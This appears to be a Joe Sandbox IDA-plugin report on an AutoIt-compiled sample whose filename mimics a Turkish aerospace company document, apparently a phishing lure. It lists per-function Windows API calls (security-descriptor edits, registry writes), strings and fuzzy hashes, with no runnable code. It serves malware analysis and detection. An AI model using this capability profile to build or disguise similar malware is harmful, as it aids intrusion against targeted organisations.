Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
String ID: AutoIt v3 GUI
API String ID: 1458621304-248962490
Opcode ID: a32c44dca3ed8b5396be468f46d13ce8c866f196dd9998a2131ac1db65fabc13
Instruction ID: 015f677011aa8c38bfe3c1e5d91f688adea613c4cac1438333b49cd76d365f37
Opcode Fuzzy Hash: a32c44dca3ed8b5396be468f46d13ce8c866f196dd9998a2131ac1db65fabc13
Instruction Fuzzy Hash: 0BB18B75A40209AFDF14DFA8DC49BEE3BB5FB58315F10422AFA15AB290DB34E850CB54

Function 001E0D8B Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 001E10F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 001E1114
Part of subcall function 001E10F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,001E0B9B,?,?,?), ref: 001E1120
Part of subcall function 001E10F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,001E0B9B,?,?,?), ref: 001E112F
Part of subcall function 001E10F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,001E0B9B,?,?,?), ref: 001E1136
Part of subcall function 001E10F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 001E114D

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 001E0DF5
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 001E0E29
GetLengthSid.ADVAPI32(?), ref: 001E0E40
GetAce.ADVAPI32(?,00000000,?), ref: 001E0E7A
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 001E0E96
GetLengthSid.ADVAPI32(?), ref: 001E0EAD
GetProcessHeap.KERNEL32(00000008,00000008), ref: 001E0EB5
HeapAlloc.KERNEL32(00000000), ref: 001E0EBC
GetLengthSid.ADVAPI32(?,00000008,?), ref: 001E0EDD
CopySid.ADVAPI32(00000000), ref: 001E0EE4
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 001E0F13
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 001E0F35
SetUserObjectSecurity.USER32(?,00000004,?), ref: 001E0F47
GetProcessHeap.KERNEL32(00000000,00000000), ref: 001E0F6E
HeapFree.KERNEL32(00000000), ref: 001E0F75
GetProcessHeap.KERNEL32(00000000,00000000), ref: 001E0F7E
HeapFree.KERNEL32(00000000), ref: 001E0F85
GetProcessHeap.KERNEL32(00000000,00000000), ref: 001E0F8E
HeapFree.KERNEL32(00000000), ref: 001E0F95
GetProcessHeap.KERNEL32(00000000,?), ref: 001E0FA1
HeapFree.KERNEL32(00000000), ref: 001E0FA8

Part of subcall function 001E1193: GetProcessHeap.KERNEL32(00000008,001E0BB1,?,00000000,?,001E0BB1,?), ref: 001E11A1
Part of subcall function 001E1193: HeapAlloc.KERNEL32(00000000,?,00000000,?,001E0BB1,?), ref: 001E11A8
Part of subcall function 001E1193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,001E0BB1,?), ref: 001E11B7

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
String ID:
API String ID: 4175595110-0
Opcode ID: b60bc3ab26acbc892dc0e562d331a3f1af28eb1c173059682fe3dbf17bf793b4
Instruction ID: c3d00cb842b1ee2bea78e3114a18580e01f4be7793d3428b742683c064a64b20
Opcode Fuzzy Hash: b60bc3ab26acbc892dc0e562d331a3f1af28eb1c173059682fe3dbf17bf793b4
Instruction Fuzzy Hash: 5471AE7590024AABDF21DFA5EC48FEEBBB8BF18300F148125F918E6191DB719D55CB60

Function 0020C3B7 Relevance: 30.2, APIs: 11, Strings: 6, Instructions: 495registryCOMMON

Download Yara Rule

APIs

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0020C4BD
RegCreateKeyExW.ADVAPI32(?,?,00000000,0021CC08,00000000,?,00000000,?,?), ref: 0020C544
RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 0020C5A4
_wcslen.LIBCMT ref: 0020C5F4
_wcslen.LIBCMT ref: 0020C66F
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000001,?,?), ref: 0020C6B2
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 0020C7C1
RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 0020C84D
RegCloseKey.ADVAPI32(?), ref: 0020C881
RegCloseKey.ADVAPI32(00000000), ref: 0020C88E
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 0020C960

Strings

REG_DWORD, xrefs: 0020C804
REG_EXPAND_SZ, xrefs: 0020C5CD
REG_MULTI_SZ, xrefs: 0020C6F5
REG_QWORD, xrefs: 0020C8C3
REG_BINARY, xrefs: 0020C913
REG_SZ, xrefs: 0020C644

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: Value$Close$_wcslen$ConnectCreateRegistry
String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
API String ID: 9721498-966354055
Opcode ID: 6f828dc2911b4d0eaf6ceef2995ece752d89193f643f4c82ea837d86892e1319
Instruction ID: 4f54fb26427e32e769c7ef52fd44467ea5c701911368fe4f5e76f96044fe99b1
Opcode Fuzzy Hash: 6f828dc2911b4d0eaf6ceef2995ece752d89193f643f4c82ea837d86892e1319
Instruction Fuzzy Hash: B81266752142019FDB14EF14D881A2ABBE5FF88714F24895CF89A9B3A2DB31ED41CB91

Function 0021091E Relevance: 30.1, APIs: 6, Strings: 11, Instructions: 372windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 002109C6
_wcslen.LIBCMT ref: 00210A01
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00210A54
_wcslen.LIBCMT ref: 00210A8A
_wcslen.LIBCMT ref: 00210B06
_wcslen.LIBCMT ref: 00210B81

Part of subcall function 0019F9F2: _wcslen.LIBCMT ref: 0019F9FD

Part of subcall function 001E2BE8: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 001E2BFA

Strings

UNCHECK, xrefs: 00210D3E
CHECK, xrefs: 00210A85, 00210AA0
GETTEXT, xrefs: 00210C97
ISCHECKED, xrefs: 00210CE1
GETITEMCOUNT, xrefs: 00210C1E
GETTOTALCOUNT, xrefs: 002109F2, 00210A17
SELECT, xrefs: 00210D11
EXPAND, xrefs: 00210BF8
GETSELECTED, xrefs: 00210C4E
EXISTS, xrefs: 00210B7C, 00210B97
COLLAPSE, xrefs: 00210B01, 00210B1C

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: _wcslen$MessageSend$BuffCharUpper
String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
API String ID: 1103490817-4258414348
Opcode ID: 3f42dd62258f29d4111f5a695ab2855799d83108a7ebba6e06ad4868daa6df63
Instruction ID: 5f1a811b01bd97558bf81a92654316c5c5b34885632836367b2b583bce62218f
Opcode Fuzzy Hash: 3f42dd62258f29d4111f5a695ab2855799d83108a7ebba6e06ad4868daa6df63
Instruction Fuzzy Hash: A7E1C2352287028FC714EF24C49096EB7E1FFA8318B14495DF8959B3A2D770EE95CB91

Function 0020C998 Relevance: 30.0, APIs: 7, Strings: 10, Instructions: 242COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,?,?,?,?,?,0020B6AE,?,?), ref: 0020C9B5
_wcslen.LIBCMT ref: 0020C9F1
_wcslen.LIBCMT ref: 0020CA68
_wcslen.LIBCMT ref: 0020CA9E
_wcslen.LIBCMT ref: 0020CAF9
_wcslen.LIBCMT ref: 0020CB2F
_wcslen.LIBCMT ref: 0020CB7F

Strings

HKCR, xrefs: 0020CB29, 0020CB2E
HKLM, xrefs: 0020CA98, 0020CA9D
HKEY_LOCAL_MACHINE, xrefs: 0020CA62, 0020CA67
HKEY_CLASSES_ROOT, xrefs: 0020CAF3, 0020CAF8
HKU, xrefs: 0020CBF0
HKEY_CURRENT_USER, xrefs: 0020CBBD
HKEY_CURRENT_CONFIG, xrefs: 0020CB79, 0020CB7E
HKCU, xrefs: 0020CBCE
HKEY_USERS, xrefs: 0020CBDF
HKCC, xrefs: 0020CBAC

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: _wcslen$BuffCharUpper
String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
API String ID: 1256254125-909552448
Opcode ID: f5d595a2d6b6835bc6871577f78794ddfead7dc59b4c3e89df4ecc5603ced536
Instruction ID: 2cb29674b33ff7df71b6977a7cbcb16e3e95c187472c5639d938f3f6372aace5
Opcode Fuzzy Hash: f5d595a2d6b6835bc6871577f78794ddfead7dc59b4c3e89df4ecc5603ced536
Instruction Fuzzy Hash: F871F5B263026B8BCB10DF68C8415BB3395AB71758B750729FC66972C6E770CD65C3A0

Function 0021833C Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 196windowlibraryCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0021835A
_wcslen.LIBCMT ref: 0021836E
_wcslen.LIBCMT ref: 00218391
_wcslen.LIBCMT ref: 002183B4
LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 002183F2
LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,00215BF2), ref: 0021844E
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00218487
LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 002184CA
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00218501
FreeLibrary.KERNEL32(?), ref: 0021850D
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0021851D
DestroyIcon.USER32(?,?,?,?,?,00215BF2), ref: 0021852C
SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00218549
SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00218555

Strings

.dll, xrefs: 002183AB
.exe, xrefs: 00218388
.icl, xrefs: 00218368

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: Load$Image_wcslen$IconLibraryMessageSend$DestroyExtractFree
String ID: .dll$.exe$.icl
API String ID: 799131459-1154884017
Opcode ID: a12915a7dab418be1113de151883e9b1afd18638a29345306d418d5a67f927f8
Instruction ID: 173934c67da0499232269defff9aa4e769352abf3518e7daee83a548a46d22c3
Opcode Fuzzy Hash: a12915a7dab418be1113de151883e9b1afd18638a29345306d418d5a67f927f8
Instruction Fuzzy Hash: 0661C171550216BBEB14DF64DC85BFE77A8FB28711F104609F815D60D1DFB4AAA0CBA0

Function 00187778 Relevance: 28.3, APIs: 1, Strings: 15, Instructions: 273COMMON

Download Yara Rule

Strings

#requireadmin, xrefs: 001877FF
Bad directive syntax error, xrefs: 001C519A
#OnAutoItStartRegister, xrefs: 00187817
', xrefs: 001C5169
#include, xrefs: 00187847
#notrayicon, xrefs: 001877E7
#comments-start, xrefs: 0018785F, 001878B1
#cs, xrefs: 00187873, 001878C5
#ce, xrefs: 001878ED
#pragma compile, xrefs: 001877D3
#include-once, xrefs: 0018782F
#comments-end, xrefs: 001878D9
Cannot parse #include, xrefs: 001C5279
Unterminated group of comments, xrefs: 001C528C
", xrefs: 001C5153

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID:
String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
API String ID: 0-1645009161
Opcode ID: 32c7ca0d4d559454ab7d232753c2017aea258b76b10b9fd1cf6bdc5d652e5104
Instruction ID: d8e42c05ff09e03f5db34a81237c34a68d09b723cacda57ef3f1b1222e7d8562
Opcode Fuzzy Hash: 32c7ca0d4d559454ab7d232753c2017aea258b76b10b9fd1cf6bdc5d652e5104
Instruction Fuzzy Hash: DF81E571644605BBDB24BF60DC46FAE77B9AF36300F144029F805AA1D6EB70DB91CBA1

Function 001E5A1B Relevance: 27.2, APIs: 18, Instructions: 198windowtimeCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000063), ref: 001E5A2E
SendMessageW.USER32(?,00000080,00000000,00000000), ref: 001E5A40
SetWindowTextW.USER32(?,?), ref: 001E5A57
GetDlgItem.USER32(?,000003EA), ref: 001E5A6C
SetWindowTextW.USER32(00000000,?), ref: 001E5A72
GetDlgItem.USER32(?,000003E9), ref: 001E5A82
SetWindowTextW.USER32(00000000,?), ref: 001E5A88
SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 001E5AA9
SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 001E5AC3
GetWindowRect.USER32(?,?), ref: 001E5ACC
_wcslen.LIBCMT ref: 001E5B33
SetWindowTextW.USER32(?,?), ref: 001E5B6F
GetDesktopWindow.USER32 ref: 001E5B75
GetWindowRect.USER32(00000000), ref: 001E5B7C
MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 001E5BD3
GetClientRect.USER32(?,?), ref: 001E5BE0
PostMessageW.USER32(?,00000005,00000000,?), ref: 001E5C05
SetTimer.USER32(?,0000040A,00000000,00000000), ref: 001E5C2F

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer_wcslen
String ID:
API String ID: 895679908-0
Opcode ID: 5ba2fa9d3e5965ca9a1e92144a52e44d2519dec0941cf1d1dfbcf351599de794
Instruction ID: caaff36315d8aec9941105080d344abbb14ec964644419c84bdd54ef9861b7ef
Opcode Fuzzy Hash: 5ba2fa9d3e5965ca9a1e92144a52e44d2519dec0941cf1d1dfbcf351599de794
Instruction Fuzzy Hash: 6D717035900B45AFDB24DFA9CE89BAEBBF6FF48708F104518E542A35A0DB75E940CB50

Function 001E30F7 Relevance: 26.6, APIs: 8, Strings: 7, Instructions: 400COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 001E318D
_wcslen.LIBCMT ref: 001E31F8

Strings

CLASSNN, xrefs: 001E31F3, 001E3204
CLASS, xrefs: 001E3188, 001E31A5
TEXT, xrefs: 001E347C
REGEXPCLASS, xrefs: 001E3255, 001E3266
INSTANCE, xrefs: 001E3453
[$, xrefs: 001E339A
NAME, xrefs: 001E3335, 001E3346

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: _wcslen
String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT$[$
API String ID: 176396367-3695031215
Opcode ID: 9b7439fdbc4f21546c532f07f63971521129aad4ce0c6b152bb4808af01178e8
Instruction ID: feaba054faba7d498f8d542666546f7e5448c0c0859d06425ceb21881bc181a3
Opcode Fuzzy Hash: 9b7439fdbc4f21546c532f07f63971521129aad4ce0c6b152bb4808af01178e8
Instruction Fuzzy Hash: 97E10732A00956ABCB189F75C449BEEF7B0BF54710F558129E466E7280DB30AF85CB90

Function 001A00C6 Relevance: 26.3, APIs: 10, Strings: 5, Instructions: 81COMMON

Download Yara Rule

APIs

__scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 001A00C6

Part of subcall function 001A00ED: InitializeCriticalSectionAndSpinCount.KERNEL32(0025070C,00000FA0,4BDA72C9,?,?,?,?,001C23B3,000000FF), ref: 001A011C
Part of subcall function 001A00ED: GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,001C23B3,000000FF), ref: 001A0127
Part of subcall function 001A00ED: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,001C23B3,000000FF), ref: 001A0138
Part of subcall function 001A00ED: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 001A014E
Part of subcall function 001A00ED: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 001A015C
Part of subcall function 001A00ED: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 001A016A
Part of subcall function 001A00ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 001A0195
Part of subcall function 001A00ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 001A01A0

___scrt_fastfail.LIBCMT ref: 001A00E7

Part of subcall function 001A00A3: __onexit.LIBCMT ref: 001A00A9

Strings

InitializeConditionVariable, xrefs: 001A0148
SleepConditionVariableCS, xrefs: 001A0154
kernel32.dll, xrefs: 001A0133
WakeAllConditionVariable, xrefs: 001A0162
api-ms-win-core-synch-l1-2-0.dll, xrefs: 001A0122

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
API String ID: 66158676-1714406822
Opcode ID: b67c00143843f2a2a73b2b4684eeeb586ee29a41872b1b140cbcf8f841ecd160
Instruction ID: ea8a5098cd6359e55bd307cba1ab5278e5ffb62bf60ae18ae6e4e433fd565080
Opcode Fuzzy Hash: b67c00143843f2a2a73b2b4684eeeb586ee29a41872b1b140cbcf8f841ecd160
Instruction Fuzzy Hash: 9721073AA847017BD7125B64BD4ABEA73E4EB2FB51F114129F805D2291DF70DC408A94

Function 001F44C0 Relevance: 24.8, APIs: 7, Strings: 7, Instructions: 309COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(00000000,00000000,0021CC08), ref: 001F4527
_wcslen.LIBCMT ref: 001F453B
_wcslen.LIBCMT ref: 001F4599
_wcslen.LIBCMT ref: 001F45F4
_wcslen.LIBCMT ref: 001F463F
_wcslen.LIBCMT ref: 001F46A7

Part of subcall function 0019F9F2: _wcslen.LIBCMT ref: 0019F9FD

GetDriveTypeW.KERNEL32(?,00246BF0,00000061), ref: 001F4743

Strings

ramdisk, xrefs: 001F46F1
removable, xrefs: 001F45EA, 001F45EF
fixed, xrefs: 001F4635, 001F463A
all, xrefs: 001F4531, 001F4536
network, xrefs: 001F469D, 001F46A2
cdrom, xrefs: 001F458F, 001F4594
unknown, xrefs: 001F4708

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: _wcslen$BuffCharDriveLowerType
String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
API String ID: 2055661098-1000479233
Opcode ID: f2b8e2e078945b9853fe25b41a43b6a629b3dbcc616c5c26802d0e0625808db1
Instruction ID: 88734fd0d3b08324325974fb0efd7578de5fcf7997eea74abe1db6559e84a143
Opcode Fuzzy Hash: f2b8e2e078945b9853fe25b41a43b6a629b3dbcc616c5c26802d0e0625808db1
Instruction Fuzzy Hash: BCB122316083069FC714EF28C890A7BB7E5BFA6724F504A1DF696C7291E730D945CB92

Function 0021911E Relevance: 24.7, APIs: 10, Strings: 4, Instructions: 181windowfileCOMMON

Download Yara Rule

APIs

Part of subcall function 00199BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00199BB2

DragQueryPoint.SHELL32(?,?), ref: 00219147

Part of subcall function 00217674: ClientToScreen.USER32(?,?), ref: 0021769A
Part of subcall function 00217674: GetWindowRect.USER32(?,?), ref: 00217710
Part of subcall function 00217674: PtInRect.USER32(?,?,00218B89), ref: 00217720

SendMessageW.USER32(?,000000B0,?,?), ref: 002191B0
DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 002191BB
DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 002191DE
SendMessageW.USER32(?,000000C2,00000001,?), ref: 00219225
SendMessageW.USER32(?,000000B0,?,?), ref: 0021923E
SendMessageW.USER32(?,000000B1,?,?), ref: 00219255
SendMessageW.USER32(?,000000B1,?,?), ref: 00219277
DragFinish.SHELL32(?), ref: 0021927E
DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 00219371

Strings

@GUI_DROPID, xrefs: 0021929E
@GUI_DRAGID, xrefs: 002192E9
p#%, xrefs: 002192BB
@GUI_DRAGFILE, xrefs: 00219320

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen
